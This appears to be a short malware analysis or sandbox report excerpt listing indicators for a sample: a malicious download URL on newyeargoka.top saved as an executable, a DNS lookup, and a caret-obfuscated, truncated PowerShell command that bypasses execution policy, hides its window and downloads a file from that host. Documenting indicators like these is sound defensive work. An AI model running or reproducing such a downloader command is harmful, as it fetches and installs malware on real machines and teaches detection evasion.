Technical Information
- http://newyeargoka.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwE^rS^Hell.ExE^ ^-ex^e^CuT^IonP^O^l^I^c^y bYpASs -n^oP^Rofil^E -WIN^dO^wStYlE hI^D^DE^N (nEw^-ObJe^Ct ^s^yS^TeM.n^ET.W^e^BCLi^e^nT^).doWN^L^OAdfil^E^(^'http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "P^OwE^rS^Hell.ExE^ ^-ex^e^CuT^IonP^O^l^I^c^y bYpASs -n^oP^Rofil^E -WIN^dO^wStYlE hI^D^DE^N (nEw^-ObJe^Ct ^s^yS^TeM.n^ET.W^e^BCLi^e^nT^).doWN^L^OAdfil^E^(^'http://newyeargoka....' (with hidden window)